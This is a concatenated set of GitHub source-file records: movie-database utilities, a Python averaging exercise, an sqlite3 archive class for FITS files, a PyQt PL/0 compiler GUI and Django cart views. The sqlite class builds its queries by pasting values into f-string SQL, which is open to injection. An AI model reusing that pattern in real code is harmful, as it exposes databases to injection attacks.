db.session.rollback()\n            continue\n    return None\n\ndef add_writers(writer_list, movie):\n    for writer in writer_list:\n        try:\n            new_writer = Writer(name=writer)\n            db.session.add(new_writer)\n            db.session.commit()\n\n            movie.writers.append(new_writer)\n        except Exception:\n            db.session.rollback()\n            continue\n    return None\n\ndef create_motion_picture(id):\n    all_genres = Genre.query.all()\n    # fetch the OMDb record once and reuse it instead of one request per field\n    movie_data = get_movie(id)\n    title = movie_data['Title']\n    plot = movie_data['Plot']\n    release_date = movie_data['Released']\n    runtime = movie_data['Runtime'].split()[0]\n    genre_names = movie_data['Genre'].split()\n    directors = set(movie_data['Director'].split(','))\n    writers = set(movie_data['Writer'].split(','))\n    actors = set(movie_data['Actors'].split(','))\n    poster = movie_data['Poster']\n    earnings = movie_data['BoxOffice']\n    imdb_rating = movie_data['imdbRating']\n\n    if runtime == 'N/A':\n        runtime = -1\n    else:\n        try:\n            runtime = int(runtime)\n        except Exception:\n            runtime = -1\n\n    new_movie = Movie(title=title, plot=plot, release_date=release_date, runtime=runtime, poster=poster, earnings=earnings, imdb_rating=imdb_rating)\n    for name in genre_names:\n        for genre in all_genres:\n            if name == genre.name:\n                new_movie.genres.append(genre)\n            elif name + ',' == genre.name:\n                new_movie.genres.append(genre)\n\n    add_directors(directors, new_movie)\n    add_actors(actors, new_movie)\n    add_writers(writers, new_movie)\n\n    db.session.add(new_movie)\n\n\n","repo_name":"GrongDavid/Capstone---Movie-Hub","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"5650193670","text":"def calculation():\r\n    while True:\r\n        inputNumbers = input(\"Enter Number: \")\r\n        if inputNumbers == 'stop' or inputNumbers == '': break\r\n        value = float(inputNumbers)\r\n        numList.append(value)\r\n    return numList\r\n\r\ndef average(numList):\r\n    try:\r\n        average = float(sum(numList)/len(numList))\r\n        print(\"Average of Numbers is: \", average)\r\n    except:\r\n        print(\"Application Closed\")\r\n\r\nnumList = list()\r\nnumList = calculation()\r\naverage(numList)\r\n","repo_name":"qamarabbas408/Python-4-Everybody","sub_path":"6lists/Ex1_list5.py","file_name":"Ex1_list5.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"72421066474","text":"import sqlite3, os\nfrom ..args import args\nfrom ..log import getLogger\nfrom ..const import TABLE_FITS, TABLE_OBSV, HDR_KEYS\nfrom .. import calc\n\n# Create module's logger\nlogger = getLogger(__name__)\n\n\n# IMPORTANT: put KEYWORDS in double-quotes, some have special characters (e.g. 'DATE-OBS').\n# Note: Use ..fits.printFitsHdr() for inspection of fits files\n\n### OBSERVATION\n# Inserts row to observation table\n# see obsCreateTable for datatypes\n\n#\nclass ObservatoryDB:\n    '''class for handling sqlite3 database file\n    '''\n    conn = None\n    cursor = None\n    obsvTable = None\n    fitsTable = None\n\n    def __init__(self, dbfile, obsvTable, fitsTable):\n        ''':param dbfile: path for .db file\n        :param obsvTable: tablename for Obsv objects\n        :param fitsTable: tablename for FitsFile objects\n        '''\n        self.conn = sqlite3.connect(dbfile)\n        self.cursor = self.conn.cursor()\n        self.obsvTable = obsvTable\n        self.fitsTable = fitsTable\n\n\n
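    # Added note (not in the original source): the f-string SQL used throughout\n    # this class is open to SQL injection if untrusted values ever reach it;\n    # sqlite3 supports parameterized queries, e.g.\n    # cursor.execute('SELECT PATH FROM obsv WHERE HASH = ?', (some_hash,))\n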
#    def __query(self, string):\n#        '''This method is for internal use only. Lets any command to be executed\n#        in sqlite3 database.\n#        :param string: SQL command to be issued.\n#        :returns: result of the query (list, print for details)\n#        '''\n#        self.cursor.execute(string)\n#        return self.cursor.fetchall()\n\n    def queryHashRange(self, column, lowerHash, upperHash):\n        '''Returns column(s) which are in range of specified hashes\n        :param lowerHash: lowest hash allowed\n        :param upperHash: upper limit of hashes, is forbidden\n        :returns: result of the query (list, print for details)\n        '''\n        self.cursor.execute(\n            f'SELECT {column} FROM obsv WHERE ({lowerHash}<=HASH and HASH<{upperHash})'\n        )\n        return self.cursor.fetchall()\n\n    #\n    def queryObsv(self, hash, column):\n        ''':param hash: hash for Obsv to be queried\n        :param column: column(s) to be fetched\n        :returns: result of the query (list, print for details)\n        '''\n        self.cursor.execute(\n            f'SELECT {column} FROM {self.obsvTable} WHERE HASH = {hash};'\n        )\n        return self.cursor.fetchall()\n\n    #\n    def queryFits(self, hash, column):\n        ''':param hash: hash for FitsFile to be queried\n        :param column: column(s) to be fetched\n        :returns: result of the query (list, print for details)\n        '''\n        self.cursor.execute(\n            f'SELECT {column} FROM {self.fitsTable} WHERE HASH = {hash};'\n        )\n        return self.cursor.fetchall()\n\n    #\n    def insertObsv(self, obsv):\n        ''':param obsv: Obsv object to be inserted into database\n        :returns: True if successful\n        '''\n        try:\n            self.cursor.execute(\n                f'INSERT INTO {self.obsvTable} VALUES ('\n                f'\"{obsv.hash}\",'\n                f'\"{obsv.date}\",'\n                f'\"{obsv.tlscp}\",'\n                f'\"{obsv.objct}\",'\n                f'\"{obsv.path}\"'\n                f');'\n            )\n            self.conn.commit()\n            return True\n        except Exception as e:\n            logger.warning(f'Could not insert: {e}')\n            return False\n\n\n\n    # Not for stand-alone use, to be used when an Obsv is being inserted\n    def insertFits(self, fitsFile):\n        ''':param fitsFile: FitsFile object to be inserted into database\n        :returns: True if successful\n        '''\n        try:\n            hdrItems = ''\n            for j in range(1, len(HDR_KEYS)):  # 'SIMPLE' boundary cases\n                hdrItems += (f',\"{fitsFile.hdr[HDR_KEYS[j]]}\"' if HDR_KEYS[j] in fitsFile.hdr else f',\"NULL\"')\n\n            self.cursor.execute(\n                f'INSERT INTO {self.fitsTable} VALUES ('\n                f'\"{fitsFile.hash}\"'\n                f',\"{fitsFile.obsvHash}\"'\n                f',\"{fitsFile.path}\"'  # absolute path of file\n                # HEADER KEYWORDS BELOW\n                # Insert integer in place of boolean (SQLite3 specific)\n                f',\"{(1 if fitsFile.hdr[\"SIMPLE\"] else 0)}\"'\n                # Insert from second element of HDR_KEYS\n                f'{hdrItems}'\n                f');'\n            )\n            self.conn.commit()\n            return True\n        except Exception as e:\n            logger.warning(f'Could not insert: {fitsFile.path}')\n            logger.warning(e)\n            return False\n\n    def deleteObsv(self, obsv):\n        '''Deletes entries for Obsv and corresponding FitsFiles from their respective tables\n        :param obsv: Obsv object to be deleted\n        :returns: True if successful\n        '''\n        try:\n            self.cursor.execute(\n                f'DELETE FROM {self.obsvTable} WHERE \"HASH\" = {obsv.hash}'\n            )\n            self.cursor.execute(\n                f'DELETE FROM {self.fitsTable} WHERE \"OBSV-HASH\" = {obsv.hash}'\n            )\n            self.conn.commit()\n            return True\n        except Exception as e:\n            logger.warning(f'{e}')\n            return False\n\n    def deleteObsvByRef(self, ref):\n        '''Deletes entries for Obsv and corresponding FitsFiles from their respective tables\n        :param ref: ref of Obsv to be deleted\n        :returns: True if successful\n        '''\n        try:\n            self.cursor.execute(\n                f'DELETE FROM {self.obsvTable} WHERE \"HASH\" = {calc.hash(ref)}'\n            )\n            self.cursor.execute(\n                f'DELETE FROM {self.fitsTable} WHERE \"OBSV-HASH\" = {calc.hash(ref)}'\n            )\n            self.conn.commit()\n            return True\n        except 
Exception as err:\n            logger.warning(f'{type(err).__name__}: {err}')\n            return False\n\n    # Creates single-table for observations, with four essential columns.\n    # Shall be used for creation/migration only.\n    def createObsvTable(self):  # returns boolean\n        '''Creates table for storing Obsv object information (named as self.obsvTable value)\n        :returns: True if successful\n        '''\n        try:\n            self.cursor.execute(\n                f'CREATE TABLE IF NOT EXISTS {self.obsvTable} (\\n'\n                f'\"HASH\" INTEGER PRIMARY KEY\\n'\n                f',\"DATE\" TEXT NOT NULL\\n'  # YYYY-MM-DD, also foldername in \n                f',\"TELESCOP\" TEXT NOT NULL\\n'\n                f',\"OBJECT\" TEXT NOT NULL\\n'\n                f',\"PATH\" TEXT NOT NULL\\n'\n                f');'\n            )\n            self.conn.commit()\n            return True\n        except Exception as e:\n            logger.warning(f'{e}')\n            return False\n\n\n    # Creates single-table for FITS-Headers\n    # Shall be used at creation/migration only\n    def createFitsTable(self):  # returns boolean\n        '''Creates table for storing FitsFile object information (named as self.fitsTable value)\n        :returns: True if successful\n        '''\n        try:\n            self.cursor.execute(\n            #print(  # for debugging when table not created, print the string\n                f'CREATE TABLE IF NOT EXISTS {self.fitsTable} (\\n'\n                f'\"HASH\" INTEGER PRIMARY KEY,\\n'  # file's hash\n                f'\"OBSV-HASH\" INTEGER NOT NULL,\\n'  # hash for parent Obsv\n                f'\"PATH\" TEXT NOT NULL,\\n'  # absolute path of file\n                # HEADER KEYWORDS BELOW (AUKR-REF in header for archived files)\n                f'\"{HDR_KEYS[0]}\" INTEGER,\\n' #for bool\n                f'\"{HDR_KEYS[1]}\" INTEGER,\\n'\n                f'\"{HDR_KEYS[2]}\" INTEGER,\\n'\n                f'\"{HDR_KEYS[3]}\" INTEGER,\\n'\n                f'\"{HDR_KEYS[4]}\" INTEGER,\\n'\n                f'\"{HDR_KEYS[5]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[6]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[7]}\" TEXT NOT NULL,\\n' #str \"DATE-OBS\"\n                f'\"{HDR_KEYS[8]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[9]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[10]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[11]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[12]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[13]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[14]}\" INTEGER,\\n'\n                f'\"{HDR_KEYS[15]}\" INTEGER,\\n'\n                f'\"{HDR_KEYS[16]}\" INTEGER,\\n'\n                f'\"{HDR_KEYS[17]}\" INTEGER,\\n'\n                f'\"{HDR_KEYS[18]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[19]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[20]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[21]}\" INTEGER,\\n'\n                f'\"{HDR_KEYS[22]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[23]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[24]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[25]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[26]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[27]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[28]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[29]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[30]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[31]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[32]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[33]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[34]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[35]}\" REAL,\\n' #float\n                f'\"{HDR_KEYS[36]}\" TEXT,\\n' #str\n                # the image  #astropy.io.fits.header._HeaderCommentaryCards\n                f'\"{HDR_KEYS[37]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[38]}\" TEXT NOT NULL,\\n' #str \"OBJECT\"\n                f'\"{HDR_KEYS[39]}\" TEXT NOT NULL,\\n' #str \"TELESCOP\"\n                f'\"{HDR_KEYS[40]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[41]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[42]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[43]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[44]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[45]}\" TEXT,\\n' #float\n                f'\"{HDR_KEYS[46]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[47]}\" TEXT,\\n' #str\n                f'\"{HDR_KEYS[48]}\" TEXT,\\n' #str #was null in sample\n                f'\"{HDR_KEYS[49]}\" TEXT,\\n' #str #was null in sample\n                
f'\"{HDR_KEYS[50]}\" TEXT,\\n' #float\n f'\"{HDR_KEYS[51]}\" TEXT,\\n' #float\n f'\"{HDR_KEYS[52]}\" TEXT,\\n' #float\n f'\"{HDR_KEYS[53]}\" TEXT,\\n' #float\n f'\"{HDR_KEYS[54]}\" TEXT NOT NULL\\n' #str \"AUKR-REF\"\n # END of HEADER KEYWORDS\n f');'\n )\n self.conn.commit()\n return True\n except Exception as e:\n logger.warning(f'{e}')\n return False\n\n \n\n\n# Create database object to connect provided sqlite3.db file\narchiveDB = ObservatoryDB(args.dbfile, TABLE_OBSV, TABLE_FITS)\nif not archiveDB.createFitsTable():\n logger.info(f'Table \"{TABLE_FITS}\" could not be created')\nif not archiveDB.createObsvTable():\n logger.info(f'Table \"{TABLE_OBSV}\" could not be created')\n","repo_name":"cbugk/obsman","sub_path":"obsman/python3-code/aukr/omal/sqlitedb/sqlitedb.py","file_name":"sqlitedb.py","file_ext":"py","file_size_in_byte":11193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18369094708","text":"import sys\r\nimport traceback\r\n\r\nimport time\r\n\r\nimport re\r\nfrom PyQt5.QtCore import QThread, pyqtSignal\r\nfrom PyQt5.QtGui import QTextCursor, QColor, QTextCharFormat\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QFileDialog, qApp, QLabel, QMessageBox, QAction\r\n\r\nfrom CompilerUi.Highlighter import Pl0Highlighter\r\nfrom Pl0compiler import Error\r\nfrom Pl0compiler.Interpreter import Interpreter\r\nfrom Pl0compiler.Praser import Praser, SymbolTable\r\nfrom Pl0compiler.Scanner import Scanner\r\nfrom CompilerUi.about import Ui_Form\r\nfrom CompilerUi.mainWindow import Ui_MainWindow\r\nfrom CompilerUi.pcodeRun import Ui_runCodeForm\r\n\r\n\r\nclass MainWindow(QMainWindow, Ui_MainWindow):\r\n def __init__(self, parent=None):\r\n super(MainWindow, self).__init__(parent)\r\n self.runcodeForm = RunCodeForm()\r\n self.about = About()\r\n\r\n self.setupUi(self)\r\n\r\n self.tableSelectHorizontalSlider.setRange(0, 2)\r\n self.highlighter = Pl0Highlighter(self.sourceCodePlainTextEdit.document())\r\n self.filePath = None\r\n self.compileFin = False\r\n self.table = []\r\n self.pcodeList = None\r\n self.permanent = QLabel()\r\n self.permanent.setText(\"line 1 col 0\")\r\n self.statusbar.addPermanentWidget(self.permanent)\r\n self.tableSelectHorizontalSlider.setVisible(False)\r\n self.lastTag = -1\r\n\r\n def menubarTriggle(self, action):\r\n if self.actionNewFile == action:\r\n self.newFile()\r\n if self.actionOpenFile == action:\r\n self.openFile()\r\n elif self.actionSaveFile == action:\r\n self.saveFile()\r\n elif self.actionSaveAs == action:\r\n self.saveAs()\r\n elif self.actionExit == action:\r\n qApp.quit()\r\n elif self.actionAbout == action:\r\n self.about.show()\r\n elif self.actionSavePcode == action:\r\n self.savePcode()\r\n\r\n def newFile(self):\r\n self.filePath = None\r\n self.lastTag = -1\r\n self.compileFin = False\r\n self.pcodePlainTextEdit.clear()\r\n self.tableTextEdit.clear()\r\n self.setWindowTitle(\"Pl0文法编译器 untitled\")\r\n self.sourceCodePlainTextEdit.clear()\r\n self.ErrortextBrowser.clear()\r\n\r\n def openFile(self):\r\n fileName = QFileDialog.getOpenFileName(self, \"打开文件\", \"\",\r\n \"Text files(*.txt);;Pl0 files(*.pl);;Python files(*.py)\")\r\n if fileName != ('', ''):\r\n try:\r\n with open(fileName[0], 'r', encoding=\"utf-8\") as fp:\r\n src = fp.read()\r\n except:\r\n with open(fileName[0], 'r', encoding=\"gbk\") as fp:\r\n src = fp.read()\r\n\r\n finally:\r\n self.filePath = fileName[0]\r\n self.lastTag = -1\r\n self.compileFin = False\r\n 
self.setWindowTitle(\"Pl0文法编译器 \" + self.filePath)\r\n self.sourceCodePlainTextEdit.document().clear()\r\n self.sourceCodePlainTextEdit.setPlainText(src)\r\n self.ErrortextBrowser.clear()\r\n self.pcodePlainTextEdit.clear()\r\n self.tableTextEdit.clear()\r\n\r\n def saveFile(self):\r\n if self.filePath == None:\r\n filename = QFileDialog.getSaveFileName(self, '保存文件', \"\",\r\n \"Text files(*.txt);;Pl0 files(*.pl);;Python files(*.py)\")\r\n if filename != ('', ''):\r\n # if filename[1][0]==\"T\" and filename[0][-4:-1]!=\".txt\": #this is for linux\r\n # arg=\".txt\"\r\n # elif filename[1]==\"Pl0 files(*.pl)\" and filename[0][-3:-1]!=\".pl\":\r\n # arg=\".pl\"\r\n # elif filename[1]==\"Python files(*.py)\" and filename[0][-3:-1]!=\".py\":\r\n # arg=\".py\"\r\n # else:\r\n # arg=\"\"\r\n # self.filePath = filename[0]+arg\r\n self.filePath = filename[0]\r\n self.setWindowTitle(\"Pl0文法编译器 \" + self.filePath)\r\n else:\r\n return\r\n with open(self.filePath, 'w') as f:\r\n my_text = self.sourceCodePlainTextEdit.toPlainText()\r\n f.write(my_text)\r\n self.statusbar.showMessage(\"保存成功\")\r\n\r\n def saveAs(self):\r\n filename = QFileDialog.getSaveFileName(self, '保存文件', \"\",\r\n \"Text files(*.txt);;Pl0 files(*.pl);;Python files(*.py)\")\r\n if filename == ('', ''):\r\n return\r\n with open(filename[0], 'w') as f:\r\n my_text = self.sourceCodePlainTextEdit.toPlainText()\r\n f.write(my_text)\r\n self.statusbar.showMessage(\"保存成功\")\r\n\r\n def updateColLine(self):\r\n self.permanent.setText(\"line \" + str(self.sourceCodePlainTextEdit.textCursor().blockNumber() + 1) + \" \" + str(\r\n self.sourceCodePlainTextEdit.textCursor().columnNumber()))\r\n\r\n def savePcode(self):\r\n filename = QFileDialog.getSaveFileName(self, '保存文件', \"\",\r\n \"Text files(*.txt);;Pcode files(*.pcode);;Python files(*.py)\")\r\n if filename == ('', ''):\r\n return\r\n with open(filename[0], 'w') as f:\r\n my_text = self.pcodePlainTextEdit.toPlainText()\r\n f.write(my_text)\r\n self.statusbar.showMessage(\"保存成功\")\r\n\r\n def runPcode(self):\r\n try:\r\n if not self.compileFin:\r\n QMessageBox.warning(self, \"警告\",\r\n \"编译未完成,请先编译\")\r\n else:\r\n self.runcodeForm.setPcodeList(self.pcodeList)\r\n self.runcodeForm.runInterper()\r\n self.runcodeForm.show()\r\n except:\r\n print(traceback.format_exc())\r\n\r\n def changeTable(self, pos):\r\n self.tableTextEdit.clear()\r\n self.tableTextEdit.insertHtml(self.table[pos])\r\n\r\n def showTable(self):\r\n try:\r\n if not self.compileFin:\r\n QMessageBox.warning(self, \"警告\",\r\n \"编译未完成,请先编译\")\r\n else:\r\n self.tableTextEdit.clear()\r\n if len(self.table) > 1:\r\n self.tableSelectHorizontalSlider.setRange(0, len(self.table) - 1)\r\n self.tableSelectHorizontalSlider.setVisible(True)\r\n self.tableSelectHorizontalSlider.setValue(0)\r\n self.tableSelectHorizontalSlider.setFocus(True)\r\n self.tableTextEdit.insertHtml(self.table[0])\r\n\r\n\r\n\r\n except:\r\n print(traceback.format_exc())\r\n\r\n def showError(self, url):\r\n line = int(url.fileName()[:-1])\r\n if self.lastTag != -1:\r\n self.highlightCurrentLine(self.lastTag, 0)\r\n self.highlightCurrentLine(line, 1)\r\n self.lastTag = line\r\n\r\n def highlightCurrentLine(self, line, status):\r\n try:\r\n selection = self.sourceCodePlainTextEdit.document().findBlockByLineNumber(line)\r\n cursor = self.sourceCodePlainTextEdit.textCursor()\r\n line = selection.text() + \" \"\r\n cursor.setPosition(selection.position())\r\n cursor.movePosition(QTextCursor.EndOfLine, QTextCursor.KeepAnchor)\r\n formats = QTextCharFormat()\r\n if 
status:\r\n                formats.setBackground(QColor('red'))\r\n            cursor.removeSelectedText()\r\n            cursor.insertText(line, formats)\r\n        except:\r\n            print(traceback.format_exc())\r\n\r\n    def producePcode(self):\r\n        ##\r\n        self.compileFin = False\r\n        self.ErrortextBrowser.clear()\r\n        self.pcodePlainTextEdit.clear()\r\n        self.tableTextEdit.clear()\r\n        self.tableSelectHorizontalSlider.setValue(0)\r\n        self.tableSelectHorizontalSlider.setVisible(False)\r\n        if self.lastTag != -1:\r\n            self.highlightCurrentLine(self.lastTag, 0)\r\n        s = Scanner(content=WrapperQPlianText(self.sourceCodePlainTextEdit))\r\n        praser = Praser(s, SymbolTable(), Interpreter())\r\n        if praser.prase():\r\n            self.statusbar.showMessage(\"编译成功\")\r\n            self.compileFin = True\r\n            self.pcodeList = praser.interperter.pcodeList\r\n            text = \"\"\r\n            for i in praser.interperter.pcodeList:\r\n                text += i.toString() + \"\\n\"\r\n            self.pcodePlainTextEdit.setPlainText(text)\r\n            self.table = praser.table.tableshow\r\n        else:\r\n            self.statusbar.showMessage(\"编译中出现错误\")\r\n            self.ErrortextBrowser.insertHtml(Error.Error.errinfo)\r\n\r\n\r\nclass WrapperQPlianText:\r\n    def __init__(self, plainText):\r\n        self.plainText = plainText\r\n        self.pos = 0\r\n\r\n    def readline(self):\r\n        eof = 0\r\n        textCursor = self.plainText.textCursor()\r\n        textCursor.setPosition(self.pos)\r\n        textCursor.movePosition(QTextCursor.Down, QTextCursor.KeepAnchor)\r\n        endPos = textCursor.position()\r\n        if self.pos == endPos:\r\n            textCursor.movePosition(QTextCursor.EndOfLine, QTextCursor.KeepAnchor)\r\n            eof = 1\r\n\r\n        endPos = textCursor.position()\r\n        line = textCursor.selectedText()\r\n        self.pos = endPos\r\n        line = line.encode(encoding='ascii', errors='ignore').decode(\"ascii\")\r\n        if not eof:\r\n            line += \"\\n\"\r\n        elif line != \"\":\r\n            line += \"\\n\"\r\n        return line\r\n\r\n\r\nclass InterpreterThread(QThread, Interpreter):\r\n    updateSingnal = pyqtSignal(int, str)\r\n\r\n    def __init__(self):\r\n        super(InterpreterThread, self).__init__()\r\n        self.hasInput = False\r\n        self.inputBuffer = \"\"\r\n\r\n    def setPcodeList(self, pcodeList):\r\n        self.pcodeList = pcodeList\r\n\r\n    def readNum(self):\r\n        self.updateSingnal.emit(0, \"请输入一个数字\")\r\n        while 1:\r\n            while not self.hasInput:\r\n                time.sleep(0.3)\r\n            a = self.inputBuffer\r\n            self.hasInput = False\r\n            self.inputBuffer = \"\"\r\n            try:\r\n                return int(a)\r\n            except ValueError:\r\n                # invalid input: prompt again and wait for the next value\r\n                self.updateSingnal.emit(0, \"请输入一个数字\")\r\n\r\n    def errorshow(self, errormsg):\r\n        self.updateSingnal.emit(1, errormsg)\r\n\r\n    def printInstruct(self, msg):\r\n        self.updateSingnal.emit(0, msg)\r\n\r\n    def printRun(self, num, status):\r\n        if status == 1:\r\n            self.updateSingnal.emit(0, \"\\n\")\r\n        else:\r\n            self.updateSingnal.emit(0, str(num) + \" \")\r\n\r\n    def run(self):\r\n        self.interperter(self.pcodeList)\r\n\r\n\r\nclass RunCodeForm(QWidget, Ui_runCodeForm):\r\n    def __init__(self, parent=None):\r\n        super(RunCodeForm, self).__init__(parent)\r\n        self.setupUi(self)\r\n        self.interpre = None\r\n        exitAction = QAction(self)\r\n        exitAction.setShortcut('ESC')\r\n        exitAction.triggered.connect(self.close)\r\n        self.addAction(exitAction)\r\n\r\n    def setPcodeList(self, pcodeList):\r\n        self.interpre = InterpreterThread()\r\n        self.interpre.setPcodeList(pcodeList)\r\n\r\n    def runInterper(self):\r\n        self.errorMonitortextEdit.clear()\r\n        self.runMonitporTextEdit.clear()\r\n        self.inputLineEdit.setFocus(True)\r\n        self.interpre.updateSingnal.connect(self.updateUI)\r\n\r\n        self.interpre.start()\r\n\r\n    def updateUI(self, status, msg):\r\n        if status == 1:\r\n            self.errorMonitortextEdit.append(msg)\r\n        else:\r\n            
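# added note: append() always starts a new paragraph; the cursor moves below\r\n            # delete that break so consecutive numbers stay on one line\r\n            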
self.runMonitporTextEdit.append(msg)\r\n            self.runMonitporTextEdit.moveCursor(QTextCursor.StartOfLine)\r\n            self.runMonitporTextEdit.textCursor().deletePreviousChar()\r\n            self.runMonitporTextEdit.moveCursor(QTextCursor.EndOfLine)\r\n\r\n    def sendData(self):\r\n        if self.interpre.hasInput:\r\n            QMessageBox.warning(self, \"警告\",\r\n                                \"数据已发送,请稍等后重试\")\r\n        elif self.inputLineEdit.text() != \"\":\r\n            self.interpre.inputBuffer = self.inputLineEdit.text()\r\n            self.inputLineEdit.clear()\r\n            self.interpre.hasInput = True\r\n\r\n\r\nclass About(QWidget, Ui_Form):\r\n    def __init__(self, parent=None):\r\n        super(About, self).__init__(parent)\r\n        self.setupUi(self)\r\n\r\n    def closeAbout(self):\r\n        self.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    app = QApplication(sys.argv)\r\n    mainWindow = MainWindow()\r\n    mainWindow.show()\r\n    sys.exit(app.exec_())\r\n","repo_name":"ericma15/Pl0-Compiler","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12569,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
{"seq_id":"71818122793","text":"from django.shortcuts import render, redirect\nfrom store.models import Product\nfrom .models import CartItem, Cart\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404\nfrom store.models import Variation\nfrom django.contrib.auth.decorators import login_required\n\ndef Carts_id(request, product=None, selected_color=None, selected_size=None):\n    cart_id = request.session.session_key\n    print(\"cart id:\", cart_id)\n    if not cart_id:\n        # session.create() generates and saves a new session key; session_key is then set\n        request.session.create()\n        cart_id = request.session.session_key\n    # print(\"Cart ID:\", cart)\n    if product and selected_color and selected_size:\n        try:\n            cart_item = CartItem.objects.get(cart__cart_id=cart_id, product=product, size=selected_size, color=selected_color)\n            print(\"cart_item\", cart_item)\n            print(\"product\", product)\n            return cart_item.id if cart_item else None\n        except CartItem.DoesNotExist:\n            return None\n    return cart_id\n\n# This is my add-cart function; original code starts here\ndef add_Carts(request, product_id):\n    product = Product.objects.get(id=product_id)\n    product_variation = []\n    if request.method == \"POST\":\n        for item in request.POST:\n            print(\"item:\", item)\n            key = item\n            value = request.POST.get(item)\n            print(\"value:\", value)\n\n            try:\n                variation = Variation.objects.get(product=product, variation_category__iexact=key, variation_value__iexact=value)\n                print(\"variation:\", variation)\n                product_variation.append(variation)\n                print(\"product variation\", product_variation)\n            except:\n                pass\n\n    try:\n        cart = Cart.objects.get(cart_id=Carts_id(request))\n    except Cart.DoesNotExist:\n        cart = Cart.objects.create(\n            cart_id=Carts_id(request)\n        )\n        cart.save()\n\n    try:\n        cart_item = CartItem.objects.get(product=product, cart=cart)\n        print(\"Variations in cart_item:\", cart_item.variations.all())\n        if len(product_variation) > 0:\n            cart_item.variations.clear()\n            for item in product_variation:\n                cart_item.variations.add(item)\n        cart_item.quantity += 1\n        cart_item.save()\n    except CartItem.DoesNotExist:\n        cart_item = CartItem.objects.create(\n            product=product,\n            quantity=1,\n            cart=cart\n        )\n        if len(product_variation) > 0:\n            cart_item.variations.clear()\n            for item in product_variation:\n                cart_item.variations.add(item)\n        cart_item.save()\n    from django.db import connection\n    print(\"SQL Query:\", str(connection.queries[-1]))\n    return redirect(\"Carts\")\n\n\n
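# Added note (editor, illustrative): for anonymous visitors the Django session\n# key doubles as the cart id above -- Carts_id() creates a session on first use\n# so every visitor gets a stable cart before logging in.\n\n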
def remove_Carts(request, product_id, cart_item_id):\n    product = get_object_or_404(Product, id=product_id)\n    try:\n        if request.user.is_authenticated:\n            cart_item = CartItem.objects.get(product=product, user=request.user, id=cart_item_id)\n        else:\n            cart = Cart.objects.get(cart_id=Carts_id(request))\n            cart_item = CartItem.objects.get(product=product, cart=cart, id=cart_item_id)\n        if cart_item and cart_item.quantity > 1:\n            cart_item.quantity -= 1\n            cart_item.save()\n        else:\n            cart_item.delete()\n    except CartItem.DoesNotExist:\n        pass\n    return redirect('Carts')\n\ndef remove_Cart_item(request, product_id, cart_item_id):\n    product = get_object_or_404(Product, id=product_id)\n    if request.user.is_authenticated:\n        cart_item = CartItem.objects.get(product=product, user=request.user, id=cart_item_id)\n    else:\n        cart = Cart.objects.get(cart_id=Carts_id(request))\n        cart_item = CartItem.objects.get(product=product, cart=cart, id=cart_item_id)\n    cart_item.delete()\n    return redirect('Carts')\n\n\ndef Carts(request, total=0, quantity=0, cart_items=None):\n    try:\n        tax = 0\n        grand_total = 0\n        if request.user.is_authenticated:\n            cart_items = CartItem.objects.filter(user=request.user, is_active=True)\n        else:\n            cart = Cart.objects.get(cart_id=Carts_id(request))\n            cart_items = CartItem.objects.filter(cart=cart, is_active=True)\n        for cart_item in cart_items:\n            total += (cart_item.product.price) * cart_item.quantity\n            quantity += cart_item.quantity\n        tax = (2 * total)/100\n        grand_total = total + tax\n    except Cart.DoesNotExist:\n        pass\n    context = {\n        'total': total,\n        'quantity': quantity,\n        'cart_items': cart_items,\n        'tax': tax,\n        'grand_total': grand_total,\n    }\n    return render(request, 'store/cart.html', context)\n\n@login_required(login_url='login')\ndef checkout(request, total=0, quantity=0, cart_items=None):\n    tax = 0\n    grand_total = 0\n    try:\n        if request.user.is_authenticated:\n            cart_items = CartItem.objects.filter(user=request.user, is_active=True)\n        else:\n            cart = Cart.objects.get(cart_id=Carts_id(request))\n            cart_items = CartItem.objects.filter(cart=cart, is_active=True)\n        for cart_item in cart_items:\n            total += (cart_item.product.price) * cart_item.quantity\n            quantity += cart_item.quantity\n        tax = (2 * total)/100\n        grand_total = total + tax\n    except Cart.DoesNotExist:\n        pass\n    context = {\n        'total': total,\n        'quantity': quantity,\n        'cart_items': cart_items,\n        'tax': tax,\n        'grand_total': grand_total,\n    }\n    return render(request, 